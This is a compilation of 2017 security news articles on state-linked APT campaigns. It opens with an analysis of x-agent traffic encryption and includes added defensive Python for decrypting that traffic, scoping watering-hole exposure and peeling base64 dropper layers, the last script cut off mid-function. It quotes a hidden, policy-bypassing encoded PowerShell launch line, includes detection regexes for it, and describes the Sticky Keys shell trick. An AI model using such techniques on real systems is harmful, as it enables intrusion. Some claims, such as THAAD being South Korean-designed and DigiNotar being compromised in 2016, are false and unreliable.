Later in the code, 4 random bytes are appended to the seed, and together these form the encryption key. The seed is 50 bytes and the key length in total is 54 bytes. The data can be of variable size. For instance, the default initial request from AgentKernel is 39 bytes in total (see Figure 4) and includes the agent ID, the module ID (the sender of the message) and the supported modules. The data is always appended to a 20-byte data token, the agent ID and the sender module ID. This data token is used by the server to verify the decryption result. After producing the ciphertext with RC4 (see the next section), the encryption procedure adds 8 random bytes to the message and then converts the whole binary string to URL-compatible BASE64. Next, the encryption procedure adds a 7-byte timestamp to the message. In summary, the encryption class does the following:

Generate random 4 bytes
Encrypt the message using RC4
Add 8 random bytes to the message
Convert the binary string to BASE64
Add a timestamp to the message (7 bytes in BASE64)

RC4 function

RC4 is a stream cipher based on byte permutation. A detailed explanation of RC4 is out of the scope of this paper. The code below is x-agent’s implementation of the RC4 algorithm. The arguments to the function are the 4-byte random value, the seed and the plaintext data:

[CPU disassembly of the x-agent RC4 routine (screenshot not reproduced in this copy)]

How to decrypt x-agent data

As mentioned briefly, the only randomness in the x-agent encryption is the 4 random bytes appended to the 50-byte seed given in the previous section. Since RC4 is a synchronous stream cipher, the traffic can only be decrypted with the same key that was used for encryption. A decryption algorithm for x-agent must therefore use the same RC4 function with the same arguments. The cipher input must be the same byte stream as in the HTTP request, i.e. the timestamp and the random bytes must be stripped. The RC4 function must then be called in a brute-force loop over all possible values of the 4 random bytes, from 0 to 0xFFFFFFFF (“0 to -1” as a 32-bit integer). This is a known-plaintext attack, since the result must contain “V4MGNxZWlvcmhjOG9yZQ”. The encryption can be broken in a matter of seconds on an ordinary personal computer.
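As an added example (not Redsocks’ code), the following Python models the wrapping scheme just described (RC4 with seed plus 4 random bytes, 8 trailing random bytes, URL-safe BASE64, 7-character timestamp) and runs the known-plaintext search for the 4 key bytes on a constructed POST body. The 50-byte seed is a placeholder, the timestamp is assumed to be prepended (which keeps the “=” padding at the end), and the 4/5-byte split of agent ID and module ID is an assumption, since the paper only colour-codes them in a figure.

```python
import base64

# CONSTRUCTED placeholder seed: the real 50-byte x-agent seed is in the
# paper's figure, which this copy does not reproduce.
SEED = bytes(range(0x41, 0x41 + 50))
assert len(SEED) == 50

# 20-byte data token every decrypted message starts with; the paper names it
# as the known plaintext that identifies a correct key.
DATA_TOKEN = b"V4MGNxZWlvcmhjOG9yZQ"
TIMESTAMP_LEN = 7   # BASE64 characters added last
TRAILER_LEN = 8     # random bytes appended after RC4


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); x-agent uses it with a 54-byte key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray(len(data))
    i = j = 0
    for n, c in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = c ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def build_message(agent_id: bytes, module_id: bytes, modules: list) -> bytes:
    """Plaintext layout from the paper's Figure 4: token, agent ID, sender
    module ID, then the supported-module list with 0x23 ('#') separators."""
    return DATA_TOKEN + agent_id + module_id + b"#" + b"#".join(modules) + b"#"


def wrap_post_body(plain: bytes, nonce: bytes, trailer: bytes, timestamp: str) -> str:
    """Encryption steps in the paper's order. ASSUMPTION: the timestamp is
    prepended, so the BASE64 '=' padding stays at the end as observed."""
    assert len(nonce) == 4 and len(trailer) == TRAILER_LEN
    assert len(timestamp) == TIMESTAMP_LEN
    cipher = rc4(SEED + nonce, plain)                       # 54-byte key
    return timestamp + base64.urlsafe_b64encode(cipher + trailer).decode("ascii")


def unwrap_post_body(body: str) -> bytes:
    """Undo the wrapping: drop the timestamp, decode, drop the 8 trailing bytes."""
    raw = base64.urlsafe_b64decode(body[TIMESTAMP_LEN:])
    return raw[:-TRAILER_LEN]


def crack_nonce(body: str, start: int = 0, stop: int = 1 << 32):
    """Known-plaintext search over the 4 random key bytes. Only the first 20
    ciphertext bytes are decrypted per candidate (enough to test for
    DATA_TOKEN); the full message is decrypted once a key matches.
    Returns (nonce, plaintext) or None. The counter byte order is an
    assumption; it is irrelevant for an exhaustive search."""
    cipher = unwrap_post_body(body)
    head = cipher[:len(DATA_TOKEN)]
    for n in range(start, stop):
        nonce = n.to_bytes(4, "little")
        if rc4(SEED + nonce, head) == DATA_TOKEN:
            return nonce, rc4(SEED + nonce, cipher)
    return None


def parse_message(plain: bytes) -> dict:
    """Split a decrypted message. ASSUMPTION: 4-byte agent ID, 5-byte module ID."""
    body = plain[len(DATA_TOKEN):]
    return {
        "agent_id": body[:4],
        "module_id": body[4:9],
        "modules": [m for m in body[9:].split(b"#") if m],
    }


def demo() -> dict:
    # Constructed sample reproducing the 39-byte decrypted POST from the paper.
    plain = build_message(b"\x6b\x30\x84\xf2", b"\x01\x00\x00\x01\x00",
                          [b"\x01\x10", b"\x01\x11", b"\x01\x13"])
    nonce = (298).to_bytes(4, "little")      # small value so the demo search is quick
    body = wrap_post_body(plain, nonce, b"\x00" * TRAILER_LEN, "AAAAAAA")
    found = crack_nonce(body)
    return {"plain": plain, "body": body, "found": found,
            "parsed": parse_message(found[1]) if found else None}


if __name__ == "__main__":
    r = demo()
    print(len(r["plain"]), len(r["body"]), r["found"][0].hex(), r["parsed"])
```

The constructed body is 71 characters ending in “=”, matching the paper’s observation; note that a full 2^32 search in pure Python takes far longer than the seconds the paper reports, which assumes compiled code or a parallel search.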


Denmark blamed Russia APT28 group for cyber intrusions in Defense Ministry Emails
25.4.2017 securityaffairs
APT

Denmark on Monday denounced Russia after the publication of a report that accused Russian APT28 of hacking the defense ministry’s email accounts.
Today the Danish Government officially blamed Russia for cyber attacks against its Defense Ministry. Denmark denounced a cyber intrusion into several Defense Ministry email accounts. The accusation comes after the Centre for Cyber Security published a report on Sunday accusing a Russian APT group of a security breach that affected the emails of defense ministry employees in 2015 and 2016. “This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia,” Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.

According to the Ministry, the emails don’t contain secret information, but the intrusion represents a serious threat to the state.

“The hacked emails don’t contain military secrets, but it is of course serious,”

According to the report, hackers belonging to the notorious APT28 group (also known as Pawn Storm, Sednit, Sofacy, Fancy Bear and Tsar Team), were responsible for the cyber espionage campaign that targeted the Danish Defense Ministry.

The APT28 group was also involved in many other attacks against a number of European states, including Germany and France.

In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained “very high”.


Chinese APTs targeted the South Korean THAAD anti-missile systems
22.4.2017 securityaffairs
APT

According to researchers at FireEye, Chinese hackers targeted the South Korean Terminal High Altitude Area Defense (THAAD) missile system.
According to a new investigation conducted by security firm FireEye, Chinese hackers are trying to hack systems used by the South Korean military in order to interfere with the deployment of an anti-ballistic weapons system.

The news was confirmed by FireEye’s director of cyber-espionage analysis, John Hultquist, in an interview with the Wall Street Journal.

FireEye has observed cyber attacks aimed at hacking the Terminal High Altitude Area Defense (THAAD) missile system. The THAAD system was designed by South Korea to protect the country from incoming intercontinental ballistic missiles (ICBMs); it is part of the Star Wars defense system.

[Image: South Korea is deploying Lockheed Martin’s THAAD missile defense system (Image source Ars Technica)]

China has long been in opposition to the deployment of the THAAD since South Korea announced it as a key component of its defense infrastructure.

“China opposes Thaad, saying its radar system can reach deep into its own territory and compromise its security. South Korea and the U.S. say Thaad is purely defensive. The first components of the system arrived in South Korea last month and have been a key issue in the current presidential campaign there.” reported the WSJ.

According to FireEye, at least two different Chinese hacking crews were involved in cyber attacks against the South Korean military systems that in some way were linked to the design and deployment of the THAAD.

The two teams involved in the attack are the Tonto team and the notorious APT10.

“One of the two hacker groups, which FireEye dubbed Tonto Team, is tied to China’s military and based out of the northeastern Chinese city of Shenyang, where North Korean hackers are also known to be active, said Mr. Hultquist, a former senior U.S. intelligence analyst.” continues the WSJ. “FireEye believes the other, known as APT10, may be linked to other Chinese military or intelligence units.”

Hackers launched spear-phishing attacks using messages with weaponized attachments. According to FireEye, at least one person fell victim to the attacks; in any case, FireEye was able to profile the threat actors and track the APTs’ movements.

“Mr. Hultquist added that an error in one of the group’s operational security provided FireEye’s analysts with new information about the group’s origins.”

China’s Ministry of Defense recently declared that People’s Liberation Army “has never supported any hacking activity.”


Callisto APT Group exploited Hacking Team surveillance tools to hack Government targets
16.4.2017 securityaffairs 
APT

The Callisto APT Group borrowed the source code leaked by the hackers that broke into Hacking Team’s network.
According to F-Secure Labs, the Callisto APT Group used the leaked HackingTeam surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.

The Callisto APT group targeted government officials, military personnel, journalists and think tanks since at least 2015.

F-Secure is still investigating the case; the company’s experts reported that the Callisto Group’s infrastructure has links with entities in China, Russia, and Ukraine.

The researchers speculate the attacker is a nation state actor:

“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”


The Callisto APT Group was involved in highly targeted phishing attacks using malware that is a variant of the Scout tool from the RCS Galileo platform developed by the surveillance firm HackingTeam.

The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not use the leaked RCS Galileo source code itself; rather, the attackers used the leaked ready-made installers to set up their own installation of the RCS Galileo platform.

“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”

According to the researchers, the Callisto APT remains active: the experts observed the latest malware in February 2016, and the group continues to set up new phishing infrastructure on a weekly basis.

Let me suggest reading the report on the Callisto APT Group that is full of interesting info, including IoCs and mitigation strategies.


Operation Cloud Hopper – APT10 goes after Managed Service Providers
7.4.2017 securityaffairs
APT

Security experts uncovered a widespread campaign tracked as Operation Cloud Hopper known to be targeting managed service providers (MSPs) worldwide. Chinese APT10 group is the main suspect.
Security experts from PwC UK and BAE Systems have uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide. The experts attributed the operation to the Chinese APT group known as APT10.


The experts gathered evidence suggesting the involvement of the APT10 group, and domain registration timing indicates the operation was conducted in China’s time zone.


The attackers used the same malware employed in other attacks attributed to APT10; the Poison Ivy RAT and PlugX are the most popular malicious codes in the crew’s arsenal. Experts noticed that from around mid-2016 the group once again started to use PlugX, ChChes, Quasar and RedLeaves.

“APT10 has significantly increased its scale and capability since early 2016, including the addition of new custom tools. APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report, which comprehensively detailed the malware’s functionality and features, and its use by several China-based threat actors, including APT10.” reads the report published by the security firms. “APT10 primarily used PlugX malware from 2014 to 2016, progressively improving and deploying newer versions, while simultaneously standardizing their command and control function.”

The Operation Cloud Hopper campaign leveraged well-researched spear-phishing messages aimed at compromising MSPs.

The hackers used this tactic to obtain legitimate credentials to access the client networks of MSPs and exfiltrate sensitive data.

The attackers aimed to compromise the supply chain to steal intellectual property from the victims.

“Other threat actors have previously been observed using a similar method of a supply chain attack, for example, in the compromise of Dutch certificate authority DigiNotar in 2016 and the compromise of US retailer Target in 2013” continues the report. “We believe that the observed targeting of MSPs is part of a widescale supply-chain attack.”

Operation Cloud Hopper demonstrates that APT10 focuses on cyber espionage activity targeting intellectual property. The authors of the report confirmed that APT10 has exfiltrated a high volume of data from multiple victims by exploiting compromised MSP networks.


APT29 Uses Stealthy Backdoor to Maintain Access to Targets

3.4.2017 securityweek APT
Researchers at FireEye-owned Mandiant have conducted a detailed analysis of a stealthy backdoor used by the Russia-linked cyberespionage group APT29 to maintain access to targeted systems.

Dubbed “POSHSPY,” the malware is believed to be a secondary backdoor used by the cyberspies in case they lose access to their primary backdoors. Mandiant first spotted POSHSPY in 2015 during an incident response engagement, and identified it on the networks of several organizations over the past two years.

Similar to other pieces of malware used by APT29, POSHSPY leverages PowerShell and the Windows Management Instrumentation (WMI) administrative framework.

WMI can be used to obtain system information, start and stop processes, and configure conditional triggers. In the case of POSHSPY, WMI is used to run a PowerShell command that decrypts and executes the backdoor code directly from a WMI property, thus ensuring that no artifacts are left on the hard drive.

The WMI component of POSHSPY executes the PowerShell component every Monday, Tuesday, Thursday, Friday and Saturday at 11:33 AM local time.

Experts pointed out that the use of legitimate Windows tools and the other techniques employed in these attacks increase the backdoor’s chances of evading detection.

“POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory,” explained Matthew Dunwoody, incident response consultant at Mandiant.

“The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert,” Dunwoody added.

The malware allows attackers to download and execute additional PowerShell code and executable files. The threat communicates with command and control (C&C) servers located at URLs generated using a domain generation algorithm (DGA) that relies on lists of domain names, TLDs, subdomains, URIs, file names and file extensions. C&C communications are encrypted using AES and RSA public key cryptography.

FireEye has not shared any information on which countries or what types of organizations have been targeted in attacks involving the POSHSPY backdoor.

The APT29 group has put some effort into making its operations more difficult to detect. Earlier this month, FireEye detailed the threat actor’s use of a technique called “domain fronting” to disguise the malicious traffic generated by its tools.

APT29 is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.


APT29 group used domain fronting to evade detection long before these techniques were widely known
28.3.2017 Securityweek
APT

Experts at FireEye discovered the APT29 group adopted domain fronting long before these techniques were widely known in the IT security community.
Security firm FireEye continues to follow the APT29 group (aka The Dukes, Cozy Bear and Cozy Duke); on Monday it revealed that the cyber spies have been using a technique called “domain fronting” to make attribution of their attacks harder.

In December, the Signal development team introduced the ‘domain fronting’ technique to circumvent censorship.

The astonishing news is that the APT29 group adopted domain fronting long before these techniques were widely known in the IT security community.

Domain fronting is a technique that relies on the use of different domain names at different application layers to evade censorship.


The domain fronting technique “hides the remote endpoint of a communication. Domain fronting works at the application layer, using HTTPS, to communicate with a forbidden host while appearing to communicate with some other host, permitted by the censor,” as described in a paper published by researchers from the University of California, Berkeley, Psiphon, and Brave New Software.

“The key idea is the use of different domain names at different layers of communication. One domain appears on the “outside” of an HTTPS request—in the DNS request and TLS Server Name Indication—while another domain appears on the “inside”—in the HTTP Host header, invisible to the censor under HTTPS encryption.” continues the paper. “A censor, unable to distinguish fronted and nonfronted traffic to a domain, must choose between allowing circumvention traffic and blocking the domain entirely, which results in expensive collateral damage”

The Domain fronting technique is easy to deploy and use and doesn’t require special activities by network intermediaries.

The APT29 group has used the domain fronting technique for at least two years; the hackers leveraged the Tor network to communicate with infected machines. In order to disguise Tor traffic as apparently legitimate traffic, the cyberspies used Meek, a Tor plugin specifically designed to implement domain fronting, which allows users to send traffic to Tor inside a harmless-looking HTTPS POST request to google.com.


“APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS.” reads the analysis published by FireEye. “This tunnel provided the attacker remote access to the host system using the Terminal Services (TS), NetBIOS, and Server Message Block (SMB) services, while appearing to be traffic to legitimate websites. The attackers also leveraged a common Windows exploit to access a privileged command shell without authenticating.”

The attackers installed the Tor client and the Meek plugin on the targeted system by using a PowerShell script and a .bat file.

The APT29 group leveraged the Sticky Keys exploit to replace the legitimate executable with the Windows Command Prompt (cmd.exe) file and gain a shell on the targeted system with SYSTEM-level privileges. In this way, the attackers were able to execute several commands, including adding new accounts.

“The attacker executed the PowerShell script C:\Program Files(x86)\Google\start.ps1 to install the TOR services and implement the “Sticky Keys” exploit. This script was deleted after execution, and was not recovered.” continues the analysis.

The script that executes the Sticky Keys exploit is also used to gain persistence on the target machine, it creates a Windows service named “Google Update.”

“By employing a publicly available implementation, they were able to hide their network traffic, with minimal research or development, and with tools that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and effective network signatures.” concluded the analysis.


APT29 Cyberspies Use Domain Fronting to Evade Detection

27.3.2017 securityweek APT
The Russia-linked cyber espionage group known as APT29 has been using a technique called “domain fronting” in an effort to make it more difficult for targeted organizations to identify malicious traffic, FireEye reported on Monday.

Domain fronting is a censorship bypassing technique that involves disguising traffic to make it look as if it’s going to a host allowed by the censor, such as Google, Amazon or CloudFlare. Open Whisper Systems recently implemented the technique to help Signal users in Egypt and the United Arab Emirates bypass government censorship.

According to FireEye, the technique has been used for at least two years by the threat actor APT29, which is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.

APT29 has used the Tor anonymity network to communicate with infected machines, which could be considered suspicious by some defenders. In order to disguise Tor traffic as apparently legitimate traffic, the cyberspies used Meek, a Tor plugin that implements domain fronting and allows users to send traffic to Tor inside a harmless-looking HTTPS POST request to google.com.

In its attacks, APT29 used a PowerShell script and a .bat file to install the Tor client and the Meek plugin on the targeted system. They leveraged an exploit involving the Sticky Keys accessibility feature, where they replaced the legitimate executable with the Windows Command Prompt (cmd.exe) file. This provides the attacker a shell that they can use to execute commands with SYSTEM-level privileges, including to add or modify accounts.

The script that executes the Sticky Keys exploit also creates a Windows service named “Google Update” to ensure that the backdoor remains even after the system has been rebooted.

“APT29 adopted domain fronting long before these techniques were widely known,” said FireEye’s Matthew Dunwoody. “By employing a publicly available implementation, they were able to hide their network traffic, with minimal research or development, and with tools that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and effective network signatures.”


Top German official said Germany blocked Russian APT28 cyber attacks in 2016
27.3.2017 securityaffairs
APT

According to a German top official, Germany warded off two cyber attacks launched by the Russian state actor APT28 group in 2016.
On Friday, a top German official told Reuters that last year Germany warded off two cyber attacks launched by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium).

According to Arne Schoenbohm, president of the Federal Office for Information Security (BSI), the first attack occurred in May 2016, when the hackers attempted to create an Internet domain for Chancellor Angela Merkel’s Christian Democratic Union (CDU) party in the Baltic region.

The second attack was observed months later, when the hackers launched a spear-phishing campaign against German parties in the lower house of parliament, the Bundestag.

“Experts said that attack used a NATO domain name to try to inject malicious software into the networks of politicians.” reported the Reuters agency.


The U.S. intelligence agencies warned early this year that Russia was likely to target other European states in the coming months, especially France and Germany, which are holding major elections.

“Germany remains in danger in the cyber arena since we are highly digitized,” Schoenbohm told Reuters in an interview. “The more we digitize, the more dependent we become on networks, the greater the risk of attack.”

Schoenbohm explained that the German Government has invested heavily in improving the security of its networks against cyber attacks. It is also conducting an awareness campaign to educate politicians and parties about how to protect their networks.

“We give them advice and help them with certain measures. But in the end, what each party does is its own responsibility,” Schoenbohm said.

The official also added that Germany is sharing information on cyber attacks with other governments targeted by the APT28 group, including the United States and France.

In 2015, the APT28 group stole 16 gigabytes of data from the German parliament. In December the APT28 group also targeted the Organization for Security and Cooperation in Europe (OSCE), a security and human rights watchdog; the attack was part of a cyber espionage operation.

“Schoenbohm said neither of the 2016 attacks targeting Germany – or a string of others he did not detail – was successful, but it was unclear to what extent political parties might have experienced security breaches.” continues the Reuters report.

Schoenbohm welcomed work by Merkel’s coalition on a law that would bolster the security posture of the Government. The law will enforce security for a growing number of household Internet-connected appliances that are exposed to cyber attacks.

The spread of IoT devices must be accompanied by a significant improvement in their security to keep their owners safe.

“The worst thing that could happen” would be that consumers withdrew from the so-called ‘Internet of Things’ for fear of being hacked, he said. “We want to have a successful digitization.”


Symantec blames North Korean Lazarus APT group for recent attacks on banks
18.3.2017 thehackernews
APT

Further investigation on the attacks against Polish banks allowed Symantec to determine that North Korean Lazarus APT group was behind recent attacks on banks.
Malware researchers at Symantec say the North Korean Lazarus APT group was likely behind a recent string of cyber attacks against organizations in 31 countries. The firm also attributes to Lazarus the high-profile attacks on Bangladesh Bank, Sony and South Korean targets.

The Lazarus Group’s activity surged in 2014 and 2015; its members mostly used custom-tailored malware in their attacks, and the experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and has been involved both in cyber espionage campaigns and in sabotage operations aimed at destroying data and disrupting systems.

Experts at Symantec collected evidence that the Lazarus APT group was behind the campaign, which relied on a “loader” used to stage attacks by installing other malicious programs.

“We are reasonably certain” Lazarus behind the attacks, Symantec researcher Eric Chien said in an interview with the Reuters Agency.

Both the US and South Korean governments blame Pyongyang for the attacks, but the North Korean government has denied being behind the hacks.

Symantec did not identify the organizations targeted in the latest wave of attacks, and it is not clear whether the Lazarus APT group stole money from the victims.

According to the security firm’s experts, this was a significant escalation for the Lazarus APT group: it used more sophisticated targeting techniques than in previous cyber attacks.

Experts at Symantec analyzed the hacking campaign launched last month by the Lazarus Group. The investigations started after Polish banks had been infected with a sophisticated strain of malware.

Polish banks confirmed their systems were infected with malware after their staff visited the website of the Polish Financial Supervision Authority.

In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the Polish Financial Supervision Authority (KNF) “in order to secure evidence.”

Both BAE Systems and Symantec started investigating the attacks. According to Symantec, the threat actor behind the attack is the same one that has targeted financial organizations in 31 countries since at least October 2016.

According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.

The attackers used a “watering hole” technique to infect the machines of a specific audience with previously unknown malware: a site the intended victims are known to visit is compromised so that it serves the exploit to them.

“Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks. Since October, 14 attacks against computers in Mexico were blocked, 11 against computers in Uruguay, and two against computers in Poland.” reads the analysis published by Symantec.

At the time, Symantec said it had only “weak evidence” pointing to the Lazarus APT, but the data gathered since then confirms the group’s involvement.

The malicious code was instructed to infect visitors whose IP address showed they were from 104 specific organizations in 31 countries.

The largest number of victims were in Poland, followed by the United States, and Mexico.
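Scoping exposure to an IP-targeted watering hole, as an added example (not code from Symantec or BAE Systems): given the address list recovered from an injected targeting script, it reports which of an organisation’s own egress ranges appear on that list and which internal clients fetched the compromised site during the campaign window. The target-list snippet, the proxy log lines, the hostname watering-hole.example, the addresses and the dates are all constructed for the example; the real script’s list format is not described in the article.

```python
"""Scope exposure to an IP-targeted watering hole.

Added example, not Symantec's or BAE Systems' code. The target-list snippet,
the proxy log, the hostname, the addresses and the dates are all constructed.
"""
import ipaddress
import re
from datetime import datetime
from urllib.parse import urlsplit

IP_OR_CIDR = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?:/\d{1,2})?\b")

# Constructed stand-in for the injected targeting script; the real list format
# is not described in the article.
TARGET_SCRIPT = """
var ranges = ["203.0.113.0/24", "198.51.100.0/25", "192.0.2.17"];
if (ranges.some(function (r) { return inRange(clientIp, r); })) { loadExploit(); }
"""

MY_EGRESS = ["203.0.113.64/26", "198.51.100.200/29"]   # our public ranges (constructed)

COMPROMISED_HOST = "watering-hole.example"             # assumed hostname
WINDOW_START = datetime(2017, 2, 1)                    # constructed campaign window
WINDOW_END = datetime(2017, 2, 4)

# Constructed proxy log: timestamp, internal client, method, URL.
PROXY_LOG = [
    "2017-02-03T09:14:02 10.20.1.15 GET http://watering-hole.example/index.html",
    "2017-02-03T09:14:03 10.20.1.15 GET http://watering-hole.example/js/main.js",
    "2017-02-03T11:02:44 10.20.3.7 GET http://watering-hole.example/en/news",
    "2017-02-05T08:00:00 10.20.1.9 GET http://unrelated.example/",
    "2016-12-20T12:00:00 10.20.1.15 GET http://watering-hole.example/",
]
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+)$")


def extract_targets(script_text):
    """Every IP or CIDR literal in the script as ip_network objects (bare IPs become /32)."""
    nets = []
    for token in IP_OR_CIDR.findall(script_text):
        try:
            nets.append(ipaddress.ip_network(token, strict=False))
        except ValueError:   # octet out of range or bad prefix length
            continue
    return nets


def is_targeted(ip, targets):
    """Would a visitor coming from `ip` have been served the exploit?"""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in targets)


def targeted_egress(my_ranges, targets):
    """Pairs (our range, attacker range) where our public space overlaps the list."""
    hits = []
    for r in my_ranges:
        mine = ipaddress.ip_network(r, strict=False)
        for net in targets:
            if mine.overlaps(net):
                hits.append((str(mine), str(net)))
    return hits


def exposed_clients(log_lines, host, start, end):
    """Internal clients that fetched anything from `host` inside the campaign window."""
    clients = set()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        if start <= ts <= end and urlsplit(m["url"]).hostname == host:
            clients.add(m["client"])
    return sorted(clients)


def run_example():
    """Both checks over the constructed data: (egress overlaps, clients to triage)."""
    targets = extract_targets(TARGET_SCRIPT)
    return (targeted_egress(MY_EGRESS, targets),
            exposed_clients(PROXY_LOG, COMPROMISED_HOST, WINDOW_START, WINDOW_END))


if __name__ == "__main__":
    egress_hits, clients = run_example()
    print("our ranges on the target list:", egress_hits)
    print("clients to triage:", clients)
```

The overlap test matters more than a per-IP lookup: an organisation whose whole /24 is listed is targeted even if no single logged address matches, and the proxy scan then narrows incident response to the hosts that actually loaded the compromised site in the window rather than every host on the network.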



New APT Campaign based on Poison Ivy RAT with C&C in China has been reversed by MalwareMustDie
17.3.2017 securityaffairs 
APT

A new APT campaign based on the Poison Ivy RAT, with C&C infrastructure linked to China, has been reversed by MalwareMustDie, who shared many details about the attack vectors and the reversing techniques used.
What follows is a walk through that analysis of a fresh and insidious China-linked APT campaign.

An ordinary case of phishing?
At first it looked like the usual story: a probably infected Word document, an ordinary phishing attempt and nothing more.

The top of MalwareMustDie’s long analysis shows screenshots of an ordinary email with the usual infected Word attachment: nothing new under the sun.

The odd part was that the suspect document pulled its payload from a common free blog host, Geocities, which served a multi-layered base64-encoded VBScript; manually decoding the first layer gave the result below:


Figure 1. The decoded VBScript with its embedded “powershell.exe” command.

The classic VBScript CreateObject call is followed by a PowerShell command: powershell.exe -w hidden -ep bypass -Enc followed by a long encoded string.

PowerShell? An encoded command? An execution policy “bypass”, used for what? The three switches are the giveaway: -w hidden keeps the console window invisible, -ep bypass ignores the execution policy, and -Enc takes a base64-encoded UTF-16LE command so that the real script never appears on the command line in clear text.

Something neither ordinary nor boring emerges from the investigation, and here MalwareMustDie’s analysis becomes interesting and surprising step by step.

Decoding the remaining VBScript layers in a loop revealed complex source code directly executable by PowerShell; following MalwareMustDie through the analysis is like riding a roller coaster.

Here is an example of manually base64-decoded code that revealed yet another nested base64 layer. As the analysis notes, the functions shown in the picture are self-explanatory, and it is clear that something dangerous is happening on the victim’s computer.


Figure 2. The base64-decoded VBScript code.

After several rounds of base64 decoding the result is clear: behind the Word attachment, hidden in the VBScript, there is a long and dangerous script ready to be executed by PowerShell. But where have we seen this source code before?
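The decoding loop described above, as an added example (this is not MalwareMustDie’s code and the sample it builds is not the real Geocities payload): it walks every base64 run in a text, decodes -Enc blobs as UTF-16LE, recurses through layers that decode to text, and keeps layers that do not as shellcode candidates, while recording the PowerShell launch switches seen along the way. The three-layer sample it constructs mirrors the chain in the analysis; the Invoke-Shellcode call in it is only a stand-in for the PowerSploit code the analysis found (the name is PowerSploit’s, the call line is assumed), and the shellcode bytes are dummy bytes, not the implant.

```python
"""Peel nested base64 layers out of a VBScript/PowerShell dropper.

Added example: this is not MalwareMustDie's code, and the sample it builds is
constructed, not the real Geocities payload.
"""
import base64
import binascii
import re
import string

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PRINTABLE = set(string.printable)

# PowerShell accepts abbreviated switch names, so match the short forms too.
PS_FLAGS = {
    "hidden_window": re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
}

# Dummy bytes standing in for the shellcode; not executable and not the real implant.
FAKE_SHELLCODE = bytes([0xFC, 0xE8, 0x82, 0, 0, 0, 0x60, 0x89, 0xE5]) + bytes(range(0x80, 0xC0))


def decode_layer(blob):
    """Base64-decode one run; return ("text", str), ("binary", bytes) or None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    # -EncodedCommand payloads are UTF-16LE: for ASCII text every odd byte is NUL.
    if raw and len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        text = raw.decode("utf-16-le")
    else:
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            return ("binary", raw)
    return ("text", text) if set(text) <= PRINTABLE else ("binary", raw)


def peel(text, max_depth=10):
    """Decode every base64 run in `text`, recursing into layers that decode to text."""
    layers = []
    stack = [(1, text)]
    while stack:
        depth, current = stack.pop()
        for match in B64_RUN.finditer(current):
            decoded = decode_layer(match.group(0))
            if decoded is None:
                continue
            kind, payload = decoded
            layers.append({"depth": depth, "kind": kind, "payload": payload})
            if kind == "text" and depth < max_depth:
                stack.append((depth + 1, payload))
    return layers


def powershell_indicators(text):
    """Names of the suspicious PowerShell launch switches present in `text`."""
    return {name for name, rx in PS_FLAGS.items() if rx.search(text)}


def analyse(text):
    """Return (layers, launch indicators seen in any text layer, binary payloads)."""
    layers = peel(text)
    indicators = powershell_indicators(text)
    for layer in layers:
        if layer["kind"] == "text":
            indicators |= powershell_indicators(layer["payload"])
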